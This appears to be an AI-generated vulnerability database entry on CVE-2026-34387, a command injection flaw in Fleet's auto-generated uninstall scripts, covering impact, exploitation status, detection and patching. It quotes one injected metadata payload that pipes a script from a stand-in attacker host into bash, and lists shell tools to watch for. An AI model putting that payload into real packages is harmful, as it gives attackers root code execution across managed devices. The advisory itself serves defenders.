
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34387 is an OS command injection vulnerability in Fleet, an open-source device management platform developed by FleetDM. The flaw exists in Fleet's software installer pipeline and allows an attacker to achieve arbitrary code execution as root (macOS/Linux) or SYSTEM (Windows) on managed hosts when an uninstall is triggered for a crafted software package. All Fleet versions prior to 4.81.1 are affected. The vulnerability was published on March 27, 2026, and patched in version 4.81.1. It carries a CVSS v3.1 base score of 9.8 (Critical) (GitHub Advisory, Red Hat CVE).
The root cause is improper neutralization of special elements used in an OS command (CWE-78). When a software package is uploaded to Fleet, metadata such as package identifiers and product names is extracted from the binary and interpolated directly into auto-generated uninstall shell scripts without sanitization. An attacker can embed a malicious payload within the package metadata (e.g., via a supply-chain attack, typosquatted download, or compromised software mirror), which then executes with elevated privileges when the uninstall script runs on managed endpoints. Notably, the attacker does not need Fleet credentials — the Fleet administrator who uploads the crafted package is the unwitting enabler, not the direct target (GitHub Advisory).
Successful exploitation results in arbitrary code execution with the highest available system privileges — root on macOS and Linux, and SYSTEM on Windows — across all managed hosts that trigger the uninstall of the crafted package. This enables complete compromise of affected endpoints, including unauthorized data access, credential theft, system modification, installation of persistent backdoors, and potential lateral movement across the managed device fleet. The broad scope of impact is amplified by Fleet's role as a centralized device management platform, meaning a single malicious package upload could affect a large number of endpoints simultaneously (GitHub Advisory, Feedly).
As of the time of reporting, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (Feedly). No threat actor attribution has been identified. The EPSS score is approximately 0.373%, indicating a low current probability of exploitation in the wild. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires convincing a Fleet administrator to upload a crafted package, introducing a social engineering or supply-chain dependency that somewhat limits opportunistic exploitation despite the critical CVSS v3.1 score.
.pkg, Windows .msi, or Linux package) with metadata fields — such as package identifier or product name — containing injected shell command payloads (e.g., ; curl http://attacker.com/shell.sh | bash ;).curl, wget, bash, powershell, cmd.exe) with unusual arguments or network destinations.Fleet has released version 4.81.1, which patches this vulnerability; all users should upgrade immediately (GitHub Advisory). If an immediate upgrade is not possible, the following interim mitigations are recommended:
The vulnerability was responsibly disclosed by researcher @secfox-ai (credited as prateek-0490 on GitHub) and published by Fleet maintainer lukeheath via GitHub Security Advisories on March 27, 2026 (GitHub Advisory). Red Hat also tracked the CVE through their security advisory pipeline (Red Hat CVE). No significant broader media coverage or notable community commentary beyond standard vulnerability database aggregation has been identified at this time.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."